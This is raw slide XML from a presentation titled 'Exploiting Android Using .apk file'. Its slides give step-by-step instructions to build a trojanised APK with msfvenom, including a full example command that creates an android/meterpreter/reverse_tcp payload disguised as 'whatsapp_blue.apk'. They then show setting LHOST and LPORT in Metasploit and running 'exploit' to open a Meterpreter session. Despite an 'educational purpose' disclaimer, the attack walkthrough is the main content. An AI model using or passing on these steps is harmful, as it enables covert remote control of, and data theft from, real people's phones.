Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml"/><Relationship Id="rId19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customXml" Target="../ink/ink4.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12.xml"/><Relationship Id="rId27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emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xml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customXml" Target="../ink/ink22.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink17.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink26.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink18.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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0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3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Exploiting Android</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagram 4" descr="Circle Arrow Process" title="SmartArt"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1665219099"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5102352" y="347472"/>
          <a:ext cx="6858000" cy="58247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2927035D-EECF-4594-B332-F9C7DC9D4AC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852054" y="5467029"/>
            <a:ext cx="5250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Devices should be on same network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>               Only for educational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>purpose only.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371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1C92D-E581-4E6C-ADB1-0066E57B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506437"/>
            <a:ext cx="10515600" cy="1691322"/>
          </a:xfrm>
        </p:spPr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Set  LHOST(your local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) which was set before in ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type set LHOST “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>your_local_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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585B9A-4D5A-43A8-8F71-F3C22E57B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08" y="1906173"/>
            <a:ext cx="10492740" cy="471971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CF09056-C3EF-425A-8CA7-98B1107F9E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3418450" y="3812346"/>
            <a:ext cx="3671667" cy="13364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EF6CEDF-67D7-4788-9428-9C2BA77D5306}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2897945" y="3713705"/>
              <a:ext cx="858600" cy="158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EF6CEDF-67D7-4788-9428-9C2BA77D530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69505" y="3685265"/>
                <a:ext cx="91548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3756C250-724B-4692-8637-57503CB22181}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1280105" y="3868505"/>
              <a:ext cx="85860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3756C250-724B-4692-8637-57503CB2218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51665" y="3840065"/>
                <a:ext cx="91548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85299F6-1643-41A3-8F6D-B25F12C17739}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5627105" y="1997585"/>
              <a:ext cx="42228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85299F6-1643-41A3-8F6D-B25F12C1773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98665" y="1969145"/>
                <a:ext cx="479160" cy="5724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EB84ACEB-4CEC-45D6-A9BB-9C9910C8E585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7216726" y="5148775"/>
            <a:ext cx="1519311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Your local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>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156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1DB58-EA01-43B0-87F6-565C119A4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Set LPORT which was set before in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type set LPORT “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>port_no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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DB7C7B-E3C8-41F3-8CD0-EDAF0174D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60" y="1582615"/>
            <a:ext cx="9486207" cy="477598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5EE53B6-2DC2-4802-B0BE-8ADFB885C50F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3502855" y="4220308"/>
            <a:ext cx="3460654" cy="11676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0290D35-22F0-44CF-9168-A867D28D0B70}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3404465" y="3418505"/>
              <a:ext cx="81612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0290D35-22F0-44CF-9168-A867D28D0B7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76025" y="3390065"/>
                <a:ext cx="87300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AA53AB24-04BA-4368-BB2B-9AC2C3CB9B15}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1884905" y="3545225"/>
              <a:ext cx="78840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AA53AB24-04BA-4368-BB2B-9AC2C3CB9B1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56465" y="3516785"/>
                <a:ext cx="845280" cy="5724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EDE6FC14-756E-4304-AB89-3009898564EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6963509" y="5387927"/>
            <a:ext cx="113948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Port no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1FCF176-7529-44AC-910B-658D1E6FC633}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5844141" y="1660482"/>
              <a:ext cx="358200" cy="23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1FCF176-7529-44AC-910B-658D1E6FC63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815701" y="1632042"/>
                <a:ext cx="415080" cy="7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5097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EC52C-DC93-4417-A177-3E8B06E2C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“exploit”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CCE45B-46FE-40E0-8F32-3750E329C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27" y="1742789"/>
            <a:ext cx="10492740" cy="5115211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D6F3A54-7EF5-4FF2-90D9-686F13CAE143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1997613" y="4009292"/>
            <a:ext cx="4375052" cy="26306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065050D-FDBD-47E9-A580-173B5770F9E8}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3207545" y="3544865"/>
              <a:ext cx="830160" cy="38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065050D-FDBD-47E9-A580-173B5770F9E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79105" y="3516425"/>
                <a:ext cx="887040" cy="9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8400474-A722-41F2-976D-D09D93F6D27C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5880185" y="1800305"/>
              <a:ext cx="408600" cy="709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8400474-A722-41F2-976D-D09D93F6D27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51745" y="1771865"/>
                <a:ext cx="46548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19887D8-F1F8-44C2-9D39-ADCE6C27C1EF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1519145" y="3713705"/>
              <a:ext cx="8445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19887D8-F1F8-44C2-9D39-ADCE6C27C1E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90705" y="3685265"/>
                <a:ext cx="90144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728445AA-BEB7-445E-9EF5-97691C3C7AEC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3347945" y="5922665"/>
              <a:ext cx="114012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728445AA-BEB7-445E-9EF5-97691C3C7AE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319505" y="5894225"/>
                <a:ext cx="119700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07BE425B-8EF6-4EC5-9308-F3E7B8D1991C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3333905" y="6189785"/>
              <a:ext cx="91476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07BE425B-8EF6-4EC5-9308-F3E7B8D1991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305465" y="6161345"/>
                <a:ext cx="97164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80CB7324-EC49-4BC8-95FE-657CC01E9534}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3291785" y="6310745"/>
              <a:ext cx="2856240" cy="489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80CB7324-EC49-4BC8-95FE-657CC01E9534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263345" y="6282305"/>
                <a:ext cx="2913120" cy="105840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6F53C418-17CF-4006-B10E-2690987A2B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372665" y="3583385"/>
            <a:ext cx="2110153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Meterpreter started(exploited)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1382943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C848F-94CD-45BD-BE93-252C33E2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STEP1:Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr 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E43B79-1B9A-4CD0-AB8A-21786FBE51CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041009" y="1983545"/>
            <a:ext cx="1031971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Find your local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Type “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”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Use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” framework for creating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> file(just one line command)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –p “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>payload_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”  LHOST “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>your_local_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” LPORT “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>any_port_no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” R &gt; “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>apk_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -p android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> LHOST=192.168.78.152 LPORT=444 R &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>whatsapp_blue.apk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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File is created now check root folder search for “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>whatsapp_blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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51988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C32A6-28B5-4CA3-8396-A8FD12F4F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your local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Type “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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061E37-688F-4D82-8AE4-3706F5838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27" y="2040388"/>
            <a:ext cx="10454995" cy="4572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A0F216A-AF02-42F2-937F-431FAE07E3EA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1814705" y="3657545"/>
              <a:ext cx="18324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A0F216A-AF02-42F2-937F-431FAE07E3E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83385" y="3594545"/>
                <a:ext cx="24588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48D52B7-3A8C-4F96-849D-802F4FC65A03}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2356145" y="3657545"/>
              <a:ext cx="29592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48D52B7-3A8C-4F96-849D-802F4FC65A0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24825" y="3594545"/>
                <a:ext cx="35856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BBE4DF5-B16C-4390-9E20-86947FD60FB7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2504105" y="3657545"/>
              <a:ext cx="36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BBE4DF5-B16C-4390-9E20-86947FD60FB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72785" y="3594545"/>
                <a:ext cx="63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1A0EC03-3267-4BF7-AB34-442F94C8C88A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2504105" y="3657545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1A0EC03-3267-4BF7-AB34-442F94C8C88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72785" y="3594545"/>
                <a:ext cx="63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F3669DE-BF9A-4C8B-8D61-DFDEFB790EED}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2658905" y="3629465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F3669DE-BF9A-4C8B-8D61-DFDEFB790EE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627585" y="3566465"/>
                <a:ext cx="63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0DF09CF0-D977-47C1-8E1C-7C1FB79E699A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2658905" y="3629465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0DF09CF0-D977-47C1-8E1C-7C1FB79E699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627585" y="3566465"/>
                <a:ext cx="63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73AFF963-A516-4358-8AD2-66EA38C9380E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1814705" y="3671585"/>
              <a:ext cx="8445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73AFF963-A516-4358-8AD2-66EA38C9380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786265" y="3643145"/>
                <a:ext cx="90144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F8982DC-D885-4061-8729-84D634C0738D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3474665" y="3671585"/>
              <a:ext cx="77400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F8982DC-D885-4061-8729-84D634C0738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446225" y="3643145"/>
                <a:ext cx="830880" cy="57240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent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DCEB357-6A17-4B14-942C-D995DFEE4ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2658905" y="3629465"/>
            <a:ext cx="5458153" cy="11113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4388EAB9-4FE7-42F6-8115-C884D1150BFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8123898" y="4556146"/>
            <a:ext cx="1561514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Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip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8D6A213C-190C-430C-95CB-BAA21C1C5A1C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5176745" y="3657545"/>
              <a:ext cx="900720" cy="36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8D6A213C-190C-430C-95CB-BAA21C1C5A1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48305" y="3629105"/>
                <a:ext cx="95760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A581D883-8772-4079-8AAA-E76F27B43EBF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5880185" y="2138345"/>
              <a:ext cx="408600" cy="36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A581D883-8772-4079-8AAA-E76F27B43EBF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51745" y="2109905"/>
                <a:ext cx="46548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D334C6FA-32A2-4783-92F2-4986AB273714}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1800665" y="4796945"/>
              <a:ext cx="534960" cy="36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D334C6FA-32A2-4783-92F2-4986AB27371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772225" y="4768505"/>
                <a:ext cx="59184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8D16F7DB-E5C7-4311-B107-DFB2E38EAB63}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3052745" y="4796945"/>
              <a:ext cx="591120" cy="3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8D16F7DB-E5C7-4311-B107-DFB2E38EAB63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24305" y="4768505"/>
                <a:ext cx="64800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3A85895B-49F7-46C7-8257-BEF1E53552C8}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3601385" y="4656545"/>
              <a:ext cx="338040" cy="36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3A85895B-49F7-46C7-8257-BEF1E53552C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72945" y="4628105"/>
                <a:ext cx="39492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BB2C0937-F2E4-46FD-88E1-EC387E452CFA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1856825" y="3889025"/>
              <a:ext cx="1125720" cy="7848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BB2C0937-F2E4-46FD-88E1-EC387E452CF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828385" y="3860585"/>
                <a:ext cx="1182600" cy="13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2361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3E381-A079-4E04-9C85-881FFEFA9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518"/>
            <a:ext cx="10515600" cy="2403938"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eg:msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>payload_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”  LHOST “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>your_local_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” LPORT “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>any_port_no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” R &gt; “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apk_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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4A359D-2B94-487D-A3AB-2D832564D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" y="2121694"/>
            <a:ext cx="9715500" cy="473630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740E9AD-B11E-4AA0-B705-9DEF23D4EBC7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5359625" y="3530825"/>
              <a:ext cx="816480" cy="298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740E9AD-B11E-4AA0-B705-9DEF23D4EBC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31185" y="3502385"/>
                <a:ext cx="87336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5118DED-69AD-4828-A715-481AB7EF8531}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
